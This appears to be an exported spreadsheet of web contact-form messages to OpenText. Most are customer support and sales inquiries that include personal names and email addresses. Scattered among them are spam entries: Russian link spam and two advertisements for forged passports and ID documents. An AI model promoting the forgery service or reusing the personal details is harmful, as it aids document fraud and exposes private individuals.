  <si>
    <t>Need to reset password for vendor portal_x000D_
68466-FDunning@moret.com</t>
  </si>
  <si>
    <t xml:space="preserve">Söker kontakt med Erik Mirstam, Kenneth Gustavsson, Richard Bounds och Mark Bridger för att prata om ett potentiellt samarbete kring Teradici PCoIP. </t>
  </si>
  <si>
    <t>Looking for information on reporting using BIRT</t>
  </si>
  <si>
    <t xml:space="preserve">My Support not working </t>
  </si>
  <si>
    <t>Can I purchase one of your products to operate on my Macbook Pro. I need to be able to take measurements from architects drawings. I have used Brava Reader in my previous job to do this._x000D_
Thanks_x000D_
Gary</t>
  </si>
  <si>
    <t>asasas</t>
  </si>
  <si>
    <t>I cannot log into the OpenText support webpage</t>
  </si>
  <si>
    <t>Hi, We are a customer using Documentum already and I wanted the contact details of our account manager._x000D_
Regards,_x000D_
Amit</t>
  </si>
  <si>
    <t>My team plans to attend the What's new in OpenText Exstream 16.3? webinar tomorrow. I registered successfully on Friday. Today the webinar is no longer on the list, so some of my team cannot register.</t>
  </si>
  <si>
    <t>Sehr geerhte Damen und Herren,_x000D_
Ich bin in OpenText zertifiziert. Seit 2013 habe ich nicht mehr mit OpenText was gemacht._x000D_
Jetzt kommt mir eine Gelegenheit als Freelancer eine Aufgabe von 3 Monate._x000D_
Ich möchte gern wissen wie können Sie an der Stelle und in dieser Konstellation mich unterstützen wenn ich die Stelle bekommen würde._x000D_
Vielen Dank,_x000D_
Mit freundlichen Grüssen,_x000D_
Yassine Kammoun</t>
  </si>
  <si>
    <t>Need Information how to configure clients</t>
  </si>
  <si>
    <t xml:space="preserve">Hi I am trying to login with the new link, there is no login option on the page this is what it shows:_x000D_
	_x000D_
Browser Not Supported_x000D_
Sorry. Your browser is not currently supported by webware._x000D_
Please use one of the following;_x000D_
_x000D_
Internet Explorer 6_x000D_
Internet Explorer 7_x000D_
Internet Explorer 8_x000D_
Firefox 3.6_x000D_
Google Chrome 5.0_x000D_
Safari 5.0_x000D_
Can someone place call me as I have two orders to ASN for delivery booked in for today._x000D_
_x000D_
Thanks_x000D_
_x000D_
Sheila_x000D_
</t>
  </si>
  <si>
    <t>Good morning. I am working on a project in Airbus Helicopters Mexico. I used to use eRoom in my previous job, would like to show the advantages of using this software to my manager thats why I was wondering if you can send me the contact of a sales representative located in Mexico. Kind Regards</t>
  </si>
  <si>
    <t xml:space="preserve">need to understand your License structure. </t>
  </si>
  <si>
    <t>Dear OpenText support,_x000D_
Could you please send a reset link for my account?_x000D_
User name: norbert.danko@knorr-bremse.com_x000D_
I was not able to recovery it._x000D_
_x000D_
Thank you in advance,_x000D_
BR,_x000D_
Norbert</t>
  </si>
  <si>
    <t>Учебный центр "Профессия" [url=http://mv-spec.ru/]mv-spec.ru[/url] проводит обучение, аттестацию специалистов в как Петербурге, так и дистанционно по всей России. Обращение в наш центр ? возможность обучиться специальности без отрыва от производства, изучить лекции, находясь в любом населённом пункте РФ, выбрать максимально удобное время для лекций без ожидания формирования группы.</t>
  </si>
  <si>
    <t>We are looking for a CMS _x000D_
Nous sommes à la rechercher d'un CMS</t>
  </si>
  <si>
    <t>I am trying to find some pricing information for Content Suite 16 (and other relevant OpenText products) on your website but cannot find anything. Also I am not sure if OpenText products are available separately or as a package. Please content via email. Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I've just purchased a licence for Brara Reader and I'm trying to follow you email for requesting an activation key but I'm not getting anywhere - I'm logged in but can't see Accounts on the Top Menu. I also get the message 'We're sorry, your account does not grant you access to this resource.' even though I've confirmed my email address with you. PLease can you advise as I just want to get this working._x000D_
_x000D_
Thanks_x000D_
_x000D_
Al </t>
  </si>
  <si>
    <t>Enquire about OpenText Document Capture and Management software as a solution component for a client project.</t>
  </si>
  <si>
    <t>evaluating SAP VIM - want to look at technical documents. (VIM already in use by Hitachi Rail Italy)</t>
  </si>
  <si>
    <t>Content Server Administration Certification</t>
  </si>
  <si>
    <t>Hi, Please can you confirm if all versions of ECM are compatible with Office365? Especially ECMCS16. Thank you</t>
  </si>
  <si>
    <t>License activation problem_x000D_
Hello there,_x000D_
The RightFax server has recently become inoperable. He did not work in the backup. I can not reach the company I bought. I installed a new server. But I can not pass the license activation part. How can you help me?</t>
  </si>
  <si>
    <t>Hi, we are a growing business that is looking to upgrade our OCR, Scanning and Workflow capabilities. At this stage we are looking to initiate an RFI process to gather knowledge regarding potential solutions and identify possible suppliers. Could you please advise how we would engage. Regards Lee Nevison</t>
  </si>
  <si>
    <t>Interesse an der Implementierung eines Tools für A/B/n-Tests und Klärung einiger Fragen. Bitte per E-Mail und (zunächst) nicht telefonisch._x000D_
_x000D_
Ich würde nach Vermittlung eines Ansprechpartners gerne eine Liste mit Fragen und wichtigen Punkten übersenden und deren Beantwortung in unser Tool-Screening aufnehmen._x000D_
_x000D_
Viele Grüße und vielen Dank,_x000D_
_x000D_
Martin Gunsenheimer-Welsch_x000D_
empiriecom GmbH &amp; Co. KG_x000D_
A member of the otto group</t>
  </si>
  <si>
    <t>hi _x000D_
i received a call from a lady who was emailing me and the edi setup and costs but have not any of the information. someone else has called me but i cannot get through to them i have left them a voicemail but have not heard anything back as yet would it be possible to receive a call as soon as possible_x000D_
regards _x000D_
rob</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are an IT department and currently we are testing Imaging Windows Viewer 10.0.0 compatibility with Windows 10 release 1703. We would like to know if that version is compatible with Windows 10 1703 (Creators Update) according to your tests and knowledge. Also, we would be very grateful if you inform us about the latest version of Imaging Windows Viewer compatible with Windows 10 v.1703._x000D_
_x000D_
Thank you._x000D_
_x000D_
Best Regards.</t>
  </si>
  <si>
    <t>I am interested in OpenText Composer CipherSoft. Can you please provide a quotation to me?</t>
  </si>
  <si>
    <t>Приветствую всех! Класный у вас сайт! _x000D_
Нашёл интересные новости: _x000D_
http://uptek.ru/news/13535-anatoliy-shariy-1-e-sentyabrya-doneck.html [b] Анатолий Шарий: 1-е сентября, Донецк [/b] _x000D_
[url=http://uptek.ru/news/4332-shell-vvela-v-stroy-novuyu-platformu-na-mestorozhdenii-mars-b-v-meksikanskom-zalive.html] Shell ввела в строй новую платформу на месторождении Mars B в Мексиканском заливе [/url] _x000D_
http://uptek.ru/news/11567-ukrainskiy-zhurnalist-pokinul-rodinu-iz-za-opaseniy-za-svoyu-zhizn.html _x000D_
http://uptek.ru/energetika/1204-energiya-razvitiyu-vostoka.html _x000D_
Ещё много интересного по теме нашел тут: [b] Новости политики Новороссия [/b] http://uptek.ru/</t>
  </si>
  <si>
    <t>Hi,  I have started a product development Jan 2017 this year to develop our world class EHS Software solution.   we are almost in the final phases of MVP product and as a start up, does OPENTEXT Assist start-up by providing any of your products like reporting or BI tools for Startups.   we have developed our product completely in JAVA. _x000D_
_x000D_
Please assist._x000D_
_x000D_
Regards,_x000D_
Rahamath</t>
  </si>
  <si>
    <t>We have requirement for our end user (MOI) for the below:_x000D_
1. RightFax System Software</t>
  </si>
  <si>
    <t>I am trying to download the free version of Brava Reader. The email witht he downloadlink does not reach my address.  Please provide download link to avandyk@latbou.co.za or alternatively to avd19691013@gmail.com</t>
  </si>
  <si>
    <t>We are purusing Lianhetech ERP/xECM tender. Competior is Microsoft Dynamic. Lianhetech would like to know if OPENTEXT/SAP has any Chemical customer, who are using SAP/OT solution to meet the import requirement of FDA in US and GMP.</t>
  </si>
  <si>
    <t xml:space="preserve">Смотреть сериалы фильмы _x000D_
 _x000D_
&lt;a href=https://luun.ru&gt;сериалы&lt;/a&gt;_x000D_
[url=https://luun.ru]фильмы[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Our team is a unique producer of quality fake documents. _x000D_
We offer only original high-quality fake passports, driver's licenses, ID cards, stamps and other products for a number of countries like: _x000D_
USA, Australia, Belgium, Brazil, Canada, Italia, Finland, France, Germany, Israel, Mexico, Netherlands, Sweden, Spain, United Kingdom. This list is not full. _x000D_
 _x000D_
To get the additional information and place the order just visit our website: _x000D_
 _x000D_
http://www.salepassportsfake.cc www. salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
&gt;&gt; Contact e-mails: _x000D_
 _x000D_
 _x000D_
General support: support@salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
Technical support: admin@salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
 _x000D_
----------------------------- _x000D_
Keywords: _x000D_
 _x000D_
BUY real and original PASSPORTS _x000D_
 _x000D_
Get real and original passports USA (United States) _x000D_
 _x000D_
Get real and originalAustralian passports (Australia) _x000D_
 _x000D_
Get real and original Belgian passports (Belgium) _x000D_
 _x000D_
Get real and original Brazilian passport (Brazil) _x000D_
 _x000D_
Get real and original Canadian passports (Canada) _x000D_
 _x000D_
Get real and original passports of Finland (Finland) _x000D_
 _x000D_
Get real and original French passports (France) _x000D_
 _x000D_
Get real and original German passports (Germany) _x000D_
 _x000D_
Get real and original Dutch passport (The Netherlands) _x000D_
 _x000D_
Get real and original Israeli passports (Israel) _x000D_
 _x000D_
Get real and original passports UK (United Kingdom) _x000D_
 _x000D_
Get real and original Spanish passport (Spain) _x000D_
 _x000D_
Get real and original Mexican passports (Mexico) _x000D_
 _x000D_
Get real and original South African passports (South Africa) _x000D_
 _x000D_
Get real and original passports Swiss (Switzerland) _x000D_
 _x000D_
Get real and original German passports (Germany) _x000D_
 _x000D_
Get real and original Chinese passports (China) _x000D_
 _x000D_
Get real and original Spanish passport (Spain) _x000D_
 _x000D_
Get real and original passports Austrian (Austria) _x000D_
 _x000D_
Get real and original Japanese passports (Japan) _x000D_
 _x000D_
Get real and original passports of Ukraine (Ukraine) _x000D_
 _x000D_
Get real and original passports cambodiens (Cambodia) _x000D_
 _x000D_
Get real and original passport</t>
  </si>
  <si>
    <t>I am currently undertaking consultancy work for a company who wishes to remain unnamed in regards to possible edrms solutions.  This company is small and would only require maximum of 30 licences.  Am currently scoping approx costs for implentation and annual licencing of different edrms solutions to assist in identifying if we can go to open quote or will need to utilise tender options.  If you could give me ballpark figures by email it would be appreciated._x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>6 Month Internship</t>
  </si>
  <si>
    <t xml:space="preserve">Софосбувир - препарат для лечения хронического гепатита С - основа большинства схем терапии _x000D_
 _x000D_
&lt;a href=http://gepatit-s.ru&gt;купить софосбувир с ледипасвиром&lt;/a&gt;_x000D_
 _x000D_
[url=http://gepatit-s.ru/forum]где в индии купить софосбувир и даклатасвир[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I'm not even sure if you are who I should be contacting, but I haven't had any luck with anyone else._x000D_
I use a Softarc.com account (it's very old. Late 90s). It's been working fine until a couple of weeks ago._x000D_
_x000D_
I stopped receiving emails and when I try sending to my softarc address, I get this response._x000D_
_x000D_
"es02.edisonlearning.com rejected your message to the following email addresses:_x000D_
cecilio@softarc.com (cecilio@softarc.com)_x000D_
Your message wasn't delivered because the destination email system rejected your message for security or policy reasons. For example, the email address might only accept messages from certain senders, or it might not accept certain types of messages, like those larger than a specific size._x000D_
Contact the recipient (by phone, for example) and work with them and their email admin to determine what policy or setting blocked your message and what you should do to make sure that future messages from you won't be rejected._x000D_
For more information, see Status code 5.7.1._x000D_
_x000D_
es02.edisonlearning.com gave this error:_x000D_
Unable to relay for cecilio@softarc.com "_x000D_
_x000D_
_x000D_
Is there someone you could connect me with that can resolve this problem? Any help would be much appreciated._x000D_
Thanks_x000D_
_x000D_
Cecilio G.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I work with a provider of high quality Call Center leads. These are qualified leads, which are businesses that need multi-seat call center service. We produce them daily, and they are vetted for your specifications. _x000D_
_x000D_
Would you be open to receiving a quote on Call Center leads?_x000D_
 _x000D_
_x000D_
_x000D_
Regards,_x000D_
 _x000D_
Elle Michael_x000D_
_x000D_
We respect your privacy and want to make sure you are aware of a few things. By replying to this email, you authorize Web Leads, Inc and our affiliates that can help with your project to call you at the number you provided, and you understand that they may use automated phone technology to call you. At no time are you required to make a purchase. If you are no longer interested in receiving messages or feel you are receiving this message in error,  click here to unsubscribe</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
 _x000D_
_x000D_
Do you specialize in VOIP for businesses? _x000D_
_x000D_
_x000D_
I have a network of new business prospects daily, that want quotes on VOIP service. Are you open to receiving/purchasing these leads? _x000D_
_x000D_
_x000D_
May I send you more info about our VOIP lead service?_x000D_
_x000D_
  _x000D_
_x000D_
Best regards,_x000D_
_x000D_
 _x000D_
_x000D_
Elle Michael_x000D_
_x000D_
VOIPLeads.png_x000D_
_x000D_
830 Traction Ave. _x000D_
_x000D_
Los Angeles, CA 90013_x000D_
_x000D_
_x000D_
_x000D_
We respect your privacy and want to make sure you are aware of a few things. By replying to this email, you authorize Web Leads, Inc and our affiliates that can help with your project to call you at the number you provided, and you understand that they may use automated phone technology to call you. At no time are you required to make a purchase. If you are no longer interested in receiving messages or feel you are receiving this message in error,  click here to unsubscribe</t>
  </si>
  <si>
    <t xml:space="preserve">I am reaching out to you on behalf of the project team representing Fred Hutchinson Cancer Research Center.  We are in the process of reviewing available solutions to replace our physical fax machines with either fax as a service or fax software for on-prem setup.  We would like to send a request for information to eFax company and would appreciate if you provide us with full contact information where this request should go (contact person, physical address with attention to information, email address and a phone number).  I will look forward to your quick response._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Irina Kalmus_x000D_
</t>
  </si>
  <si>
    <t>I cannot reset my password, I get an error.</t>
  </si>
  <si>
    <t>Dear Open Text representative,_x000D_
_x000D_
I trust this mail finds you in best status. This is Mohamed Elkasaby, a Petroleum Engineer at Technical Petroleum Solutions – TPS, Oman. We are a company specialized in engineering design projects consulting and we would like to kindly inquire about the fees for a consultant license for Documentum Software on a rental basis?_x000D_
_x000D_
Looking forward to your reply and thanks in advance.</t>
  </si>
  <si>
    <t>I want to join, what service will uprovide me, will u provide invitation letter</t>
  </si>
  <si>
    <t>I need opentext login for my email id.  My company is Paragon Computer Professionals.  Please send registration link to create login for opentext.  I had previously login with EMC.</t>
  </si>
  <si>
    <t>My all the above to get to the editor??!!   _x000D_
This is regarding the community guide 2017-2018.  Reading the article on page 24 it does not give the address of the East Lake elementary school!   It bothers me due to the fact that I’m not Informed of basics.  Where is this school located?? Please do more to give info-or is it one of the 2 addresses listed at bottom of article.  Does anybody proofread these articles?_x000D_
Where is it?_x000D_
Paulette</t>
  </si>
  <si>
    <t>Привет всем! класный у вас сайт! _x000D_
Зацените, нашёл супер базу кино онлайн в хорошем качестве: [url=http://kinofanonline.ru/]сериалы 2017 онлайн в хорошем качестве[/url] _x000D_
Тут: новинки лучших фильмов 2017 уже вышедшие [b] http://kinofanonline.ru/novinki/ [/b] _x000D_
[url=http://kinofanonline.ru/serialy/] смотреть сериал лучшие 3 сезон [/url] _x000D_
[url=http://kinofanonline.ru/multfilmy/] мультфильмы 2017 смотреть бесплатно в хорошем качестве [/url] мультфильмы 2017 смотреть бесплатно в хорошем качестве _x000D_
[url=http://kinofanonline.ru/detektiv/9260-shlyuha-jade-1995.html] Смотреть Шлюха / Jade (1995) онлайн бесплатно [/url] _x000D_
http://kinofanonline.ru/melodrama/3970-stanciya-dzhima-station-jim-2001.html [b] Смотреть Станция Джима / Station Jim (2001) онлайн бесплатно [/b] _x000D_
http://kinofanonline.ru/komediya/3066-malysh-mun-lunnyy-malchik-moone-boy-sezon-1-2-2012-2014.html</t>
  </si>
  <si>
    <t xml:space="preserve">WE NEED A STEVEDOING COMPANY TO PARTNER WITH FOR A PERIOD  TEN YEARS, IF INTERESTED CONTACT ME ON MY INFORMATION </t>
  </si>
  <si>
    <t>Hello I am looking for a company that has a list of all of the businesses in the world or in Canada, and also if they have the proper email addresses of the proper people to talk to so I can seek work through these companies, is this something that you have or something similar? thanks.</t>
  </si>
  <si>
    <t>Fax appliance which can work with 4 port analog lines</t>
  </si>
  <si>
    <t>pls</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
_x000D_
I have been working in the pharmaceutical industry for many years within clinical development, regulatory affairs and drug safety both in the Industry and at Contract Research._x000D_
_x000D_
There have been a lot of individual software solutions for different areas in the pharmaworld, but there is a substantial change happening right now where there is a move towards integrated solutions especially on the compliance and document management side where specialized systems feed into the same datastructure._x000D_
_x000D_
_x000D_
I am representing a successful drug safety and pharmacovigilance software that has been on the global market for almost 20 years developed on a standard platform and I would like to discuss the possibility of integrating this software into a broader pharma integrated offering,_x000D_
_x000D_
_x000D_
At the moment some data and document management systems are moving quickly to become the one stop shop for Regulatory, Safety and Clinical trials with an enormous earning potential. These are companies like Intralinks, Veeva and Oracle. I am involved in the implementation of these systems_x000D_
_x000D_
_x000D_
Please let me know if OpenText would be interested in discussing such integration/offering_x000D_
_x000D_
_x000D_
_x000D_
Best regards,_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Steen Ottosen, MD_x000D_
_x000D_
Ottosen, LLC_x000D_
700 N Valley St_x000D_
Suite B 16508_x000D_
Anaheim_x000D_
California, 92801, USA_x000D_
_x000D_
Office: +1 805 285 2010_x000D_
Cell    : +1 858 900 4734_x000D_
_x000D_
_x000D_
Email : sto@ottosen.com</t>
  </si>
  <si>
    <t>We are interested in becoming one of the openText resellers in South Africa</t>
  </si>
  <si>
    <t>We are a startup venture company based in L.A., CA to build a new O2O, real-time, mobile, promotional communication service and F2B/C omni-channel distribution network for small retail member stores , to compete with B2C based existing channels of e-commerce(amazon+wholefoods), national chain stores(Costco, Walmart+jet.com)and are looking for technical solution partner to support the technical platform area. If you are interested in the subject, I would like to discuss details with your top management and the person in charge . My email is ioh@nestsure.com.</t>
  </si>
  <si>
    <t>Cannot access to my support account. We're sorry, your account does not grant you access to this resource</t>
  </si>
  <si>
    <t>I can't find an address to send my $ 25 bill to.  account number 861368</t>
  </si>
  <si>
    <t>I had raised a ticket for one and have got no response from 1 week. Need to be investigated asap. Ticket no: OTCS Ticket 3305079</t>
  </si>
  <si>
    <t>I am trying to download the free Brava Reader, but am not getting the download email.  Please advise.</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to reach Mike Mike Hood, Enterprise Account Manager. However there is no response from Mike on my emails and phone calls. Please have someone reach me at tapasya.das@walmart.com_x000D_
</t>
  </si>
  <si>
    <t>Software paid for but not received.</t>
  </si>
  <si>
    <t>Necessidade de ferramenta para comunicação AS2.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I have created the only Brexit quiz that shows results in real time and has just gone live._x000D_
_x000D_
I have seen that you publish information about Brexit and wonder if you would be interested in posting it on your blog. Once more people take the quiz, the results can be used to analyse and measure the effect Brexit has on matters such as moving to other countries. _x000D_
You are very welcome to use and discuss these results on your own site._x000D_
 _x000D_
It is composed of 4 personal details questions (to know who takes the quiz), followed by 10 questions related to Brexit. It takes around 1 minute to complete._x000D_
_x000D_
You can find the quiz here:_x000D_
https://sandersteads.com/brexit-quiz/_x000D_
_x000D_
Inline images 2_x000D_
_x000D_
Thank you very much for considering this. Please feel free to forward this to any person who might be interested._x000D_
_x000D_
If you have any questions or comments, please contact me either on 0115 959 7880 or on iballa.delahorra@adtrak.co.uk_x000D_
_x000D_
Have a great day!_x000D_
_x000D_
Kind Regards,_x000D_
_x000D_
Iballa de la Horra Veldman</t>
  </si>
  <si>
    <t>i have registered with you, i need full documentation to join, also required invitation letter for trv visa from bangladesh,</t>
  </si>
  <si>
    <t>Just purchased Brava. Says there is a problem changing my password.  Cant understand why ?</t>
  </si>
  <si>
    <t>question about license keys, can you provide us email adres form your licensing department in ohio</t>
  </si>
  <si>
    <t xml:space="preserve">Send me information on upgrading our Trusted Link Software. Can we upgrade the Client without the Server or do we have to both at the same time.?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Только самые свежие региональные отчеты из мира науки и технологий, авто, политики, спорта и общества _x000D_
 _x000D_
[url=https://rb-str.ru]спорт[/url]_x000D_
 _x000D_
&lt;a href=https://rb-str.ru&gt;новости Стерлитамака&lt;/a&gt;_x000D_
</t>
  </si>
  <si>
    <t>je suis un boulange je suis a nantes</t>
  </si>
  <si>
    <t>Checkout payment web page is not working, after login and add the general info / billing address I click "here to process your payment" a page with a paypal logo and the following issues appear: "Things don't appear to be working at the moment. Please try again later." Please fix it in order to buy your product. Thanks</t>
  </si>
  <si>
    <t>We want to set up Single Sign On to access our data. Can you provide the XML format we would need to exchange the information to allow this. Also, are there any charges  for this services. We are also looking at reconfiguring our environment in the near future, so we may have to repeat the exercise soon_x000D_
thanks_x000D_
_x000D_
Steve</t>
  </si>
  <si>
    <t>Hi,_x000D_
I am unable to locate main contact from Deutsche Bank for Easylink/OpenText. _x000D_
I have question regarding two webportals, myportal.easylink.com and myportal.opentext.com._x000D_
I would like to find out how these portals are used by Deutsche Bank employees._x000D_
Thank you</t>
  </si>
  <si>
    <t>Hi,_x000D_
I am a SAP Consultant and would like to learn how to implement and use VIM._x000D_
Could you please provide me with all your documentation, books, e-books, e-learnings..._x000D_
If I can buy them online, please provide me with the link._x000D_
Thank you in advance._x000D_
I stay at your disposal for any questions._x000D_
Best regards,_x000D_
Anas.</t>
  </si>
  <si>
    <t>When ever I try to login to My support, it ask for email confirmation, even I click confirmation, I can't login. I keep getting email confirmation sent screen all the time.</t>
  </si>
  <si>
    <t xml:space="preserve">Каждую неделю появляются горящие туры в Турцию, а это значит, что можно прилично сэкономить на путевк _x000D_
 _x000D_
&lt;a href=http://allincluzive.com&gt;отдых в Греции&lt;/a&gt;_x000D_
 _x000D_
[url=http://allincluzive.com]Горящие туры в Египет[/url]_x000D_
</t>
  </si>
  <si>
    <t>I am investigating the options for a DAM to support the creative assets that Pace develops.</t>
  </si>
  <si>
    <t>Look deeper within Opentext for potential purchase.</t>
  </si>
  <si>
    <t>Dear,_x000D_
Can some one help us to gether some information about the end of support of our current installed opentext version._x000D_
below is our customer name number and the contact person ._x000D_
_x000D_
Primary Contact= Igor Ignjatovic_x000D_
Account name= Stapmles Europ BV_x000D_
End user code= EU0159591</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are is using StreamServe 5.6.1 GA Design Centre. _x000D_
We ahve a proplem when we are printing Letterhead paper (Simplex / Duplex) to printer "Fuji Xerox DocuPrint P455 d". _x000D_
Problem: If we print in simplex or the total no. of pages is odd, the last page will print at the back side and upside down. How can we fix this issue?</t>
  </si>
  <si>
    <t xml:space="preserve">Was wondering if i could get a contact for the Opentext Teamsites product manager? We are considering an integration with it, and would like to get a greater understanding of the product from a fellow product manager. </t>
  </si>
  <si>
    <t>Copyright - I really like the information security logo you have on http://www.opentext.com/what-we-do/business-needs/information-governance/ensure-compliance/information-security-and-privacy_x000D_
_x000D_
Could I have your permission to use it internally to our organisation please?_x000D_
_x000D_
Best Regards_x000D_
Jim McNeill</t>
  </si>
  <si>
    <t>I have requested support access on the my support page several times and to date not successful.</t>
  </si>
  <si>
    <t>Trying to login but it keeps looping and asking me to register</t>
  </si>
  <si>
    <t>Strategic Alliance Partnership with OpenText</t>
  </si>
  <si>
    <t xml:space="preserve">Интернет магазин цифровой технике  _x000D_
[url=http://inter-mobile.ru]тут[/url]_x000D_
 _x000D_
&lt;a href=http://inter-mobile.ru&gt;тут&lt;/a&gt;_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We need to connect with Sales team to discuss on requirement for Open Text Developer license. This is immediate requirement </t>
  </si>
  <si>
    <t>Just Enquiries</t>
  </si>
  <si>
    <t>Our team is a unique producer of quality fake documents. _x000D_
We offer only original high-quality fake passports, driver's licenses, ID cards, stamps and other products for a number of countries like: _x000D_
USA, Australia, Belgium, Brazil, Canada, Italy, Finland, France, Germany, Netherlands, Spain, United Kingdom. This list is not full. _x000D_
 _x000D_
To get the additional information and place the order just visit our website: _x000D_
 _x000D_
http://www.salepassportsfake.cc www. salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
&gt;&gt; Contact e-mails: _x000D_
 _x000D_
 _x000D_
General support: support@salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
Technical support: admin@salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
 _x000D_
----------------------------- _x000D_
Keywords: _x000D_
 _x000D_
Get real and original passports USA (United States) _x000D_
Get real and original Australian passports (Australia) _x000D_
Get real and original Belgian passports (Belgium) _x000D_
Get real and original Brazilian passport (Brazil) _x000D_
Get real and original Canadian passports (Canada) _x000D_
Get real and original passports of Finland (Finland) _x000D_
Get real and original French passports (France) _x000D_
Get real and original German passports (Germany) _x000D_
Get real and original Dutch passport (The Netherlands) _x000D_
Get real and original Israeli passports (Israel) _x000D_
Get real and original passports UK (United Kingdom) _x000D_
Get real and original Spanish passport (Spain) _x000D_
Get real and original Mexican passports (Mexico) _x000D_
Get real and original South African passports (South Africa) _x000D_
Get real and original passports Swiss (Switzerland) _x000D_
Get real and original German passports (Germany) _x000D_
Get real and original Chinese passports (China) _x000D_
Get real and original Spanish passport (Spain) _x000D_
Get real and original passports Austrian (Austria) _x000D_
Get real and original Japanese passports (Japan) _x000D_
Get real and original passports of Ukraine (Ukraine) _x000D_
Get real and original passports cambodiens (Cambodia) _x000D_
Get real and original passports UK (United Kingdom) _x000D_
Get real and original passports USA _x000D_
Get real and original passports Romanian (Romania) _x000D_
Get real and or</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Would you be interested to acquire an Opt-In email list of Healthcare professionals/Hospital decision makers from your target region? _x000D_
_x000D_
To name few: 1.6 million contacts of Physicians/Doctors with over 120+ specialties, Medical Directors, CTOs/CIOs, Clinical Directors, Hospital procurement professionals, Hospital Administrators, Facilities, Nursing Professionals, Pharmacists etc., _x000D_
_x000D_
Should you be targeting any specific list? Please let me know your requirement, I will get back to you with counts and pricing details._x000D_
_x000D_
Target Industry: _____________; Geography: ______________; Job Title (Any): _________________:_x000D_
_x000D_
Regards,_x000D_
Adam Nealson_x000D_
Inside Sales Executive_x000D_
adam.nealson@v3dataintel.com_x000D_
We respect your privacy. If you want to stop receiving emails from us, please send a reply with the email subject line as "Leave Out”_x000D_
</t>
  </si>
  <si>
    <t>Hi, I would like to have some more feedback about the RECORDS MANAGEMENT LEGAL KEY EDITION and how can I get it for the company I work for.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to discuss your software reseller program. Please contact me at your earliest convenience. _x000D_
Thanks,_x000D_
Siva_x000D_
www.savvy-ts.com </t>
  </si>
  <si>
    <t>We own Documentum and are transitioning to AppXtender. You bought AppXtender about 9 months ago.  When can we expect documentation on this product on your website?  I am looking for API docs specifically. Thanks.</t>
  </si>
  <si>
    <t>keen to know if Open Text would be a good data migration tool for our incoming projects.</t>
  </si>
  <si>
    <t>Get proper PMC Installation codes for version 7 as per our GLS</t>
  </si>
  <si>
    <t>Fax support - considering integrating my product w/Open Text Fax. Need pricing info and a technical contact I can work with.</t>
  </si>
  <si>
    <t>Всем привет! класный у вас сайт! _x000D_
Зацените, нашёл супер базу кино онлайн в хорошем качестве: [url=http://kinofanonline.ru/]Список 2017 лучшие комедии[/url] _x000D_
Тут: [b] лучшие исторические фильмы бесплатно [/b] http://kinofanonline.ru/istoricheskiy/ _x000D_
[url=http://kinofanonline.ru/multfilmy/] 2017 смотреть лучшие мультфильмы [/url] _x000D_
http://kinofanonline.ru/anime/2011 [b] Рейтинг Аниме 2011 - Список лучших кинофильмов смотреть онлайн [/b] _x000D_
[url=http://kinofanonline.ru/vestern/1993] Рейтинг Вестерн 1993 - Список лучших кинофильмов смотреть онлайн [/url] _x000D_
http://kinofanonline.ru/fentezi/2015 _x000D_
[url=http://kinofanonline.ru/dokumentalnyy/1081-molniya-nad-vodoy-lightning-over-water-1980.html] Смотреть Молния над водой / Lightning Over Water (1980) онлайн бесплатно [/url] _x000D_
http://kinofanonline.ru/drama/14289-gromoboy-pik-lik-foh-1995.html [b] Смотреть Громобой / Pik lik foh (1995) онлайн бесплатно [/b] _x000D_
http://kinofanonline.ru/news/13149-dzhared-harris-poluchil-glavnuyu-rol-v-antologii-terror.html _x000D_
и Здесь: http://kinofanonline.ru/spisok-luchshih-umnyh-filmov-za-poslednie-gody/5543-zamri-i-gori-halt-and-catch-fire-sezon-1-2014.html</t>
  </si>
  <si>
    <t>interested in intelligent OCR solutions for financial services</t>
  </si>
  <si>
    <t xml:space="preserve">I am a long-time customer of Captiva.  Now I cannot log in to support at http://www.opentext.com/support._x000D_
_x000D_
If I try to create an account, it says my email address is already on file._x000D_
_x000D_
So I try to log in with the same credentials back when it was EMC or Dell.  That failed_x000D_
_x000D_
So then I did a password reset, where you emailed me a link where I enter a new password._x000D_
_x000D_
That failed._x000D_
_x000D_
I really need to log in to my account.  Please advise_x000D_
_x000D_
Thanks_x000D_
Ryan_x000D_
</t>
  </si>
  <si>
    <t>I get a registration confirmation but I still cannot access My Support</t>
  </si>
  <si>
    <t>Hello. I need to access to the support tickets for declaring a bug on Exstream. Can you grant me the good rights? My boss is Ludovic Goutard, you can contact him for confirmation._x000D_
_x000D_
thanks a lot,_x000D_
_x000D_
Remi Bourboulon</t>
  </si>
  <si>
    <t>I am unable to access my acct to enter support request - I keep getting directed to confirm email - which I do, and get confirmation email and just keeps looping.</t>
  </si>
  <si>
    <t>I had an OpenText Account previously but when I tried logging in yesterday, got an error message stating that I do not have access. I am surprised why I got this message. Can you review and let me know?</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
My name is Helen To and I am conducting market research for the University of British Columbia on various types of Content Management software solutions to understand the range of capabilities and associated costs for various solutions in this area. _x000D_
_x000D_
In particular, I wanted to know about your product’s capabilities to: _x000D_
Content management _x000D_
•	Template Set up – Manage templates (i.e. document , txt message, email and web page templates) and standardized boilerplate content and multimedia_x000D_
•	Content Authoring  – Prepare materials in a sophisticated single source content authoring environment (e.g., WYSIWYG, code views), using defined templates._x000D_
